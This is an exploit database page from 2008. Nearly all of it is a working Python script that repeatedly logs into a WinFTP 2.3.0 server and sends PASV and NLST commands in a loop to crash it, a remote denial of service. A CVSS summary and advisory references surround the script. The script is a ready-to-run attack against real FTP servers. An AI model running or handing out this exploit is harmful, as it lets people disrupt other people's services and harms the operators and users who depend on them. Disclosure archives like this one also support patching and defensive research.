WinFTP 2.3.0 (PASV mode) Remote Denial of Service Exploit

2008.12.21
Credit: (x)dmnt
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-399


CVSS Base Score: 3.5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 6.8/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Single time
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

# WinFTP v2.3.0 DoS exploit # WinFTP URL - http://www.wftpserver.com/ # DoS'ed when try to send data # (x)dmnt # -*- coding: windows-1252 -*- import socket import time import sys PORT = 21 def help_info(): print ("Usage: winftp <host> <login> <password>\n") print ("Note: anonymous is enought\n") def conn(hostname, username, passwd): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: sock.connect((hostname, PORT)) except: print ("[+] Done!") sys.exit(1) r=sock.recv(1024) print "[+] " + r sock.send("USER %s\n" %username) sock.send("PASS %s\n" %passwd) sock.send("PASV\n") sock.send("NLST -1\n") sock.send("QUIT\n") sock.close() print ("\n[WinFTP v2.3.0 remote DoS exploit]") print ("[(x)dmnt 2008 without any clue :)]\n\n") if len(sys.argv) <> 4: help_info() sys.exit(1) else: hostname=sys.argv[1] username=sys.argv[2] passwd=sys.argv[3] sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: sock.connect((hostname, PORT)) except: print ("[-] Connection error!") sock.close() sys.exit(1) while passwd: conn(hostname, username, passwd) time.sleep(0.2) sys.exit(0)

References:

http://www.milw0rm.com/exploits/6717
http://www.frsirt.com/english/advisories/2008/2801
http://secunia.com/advisories/32209


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top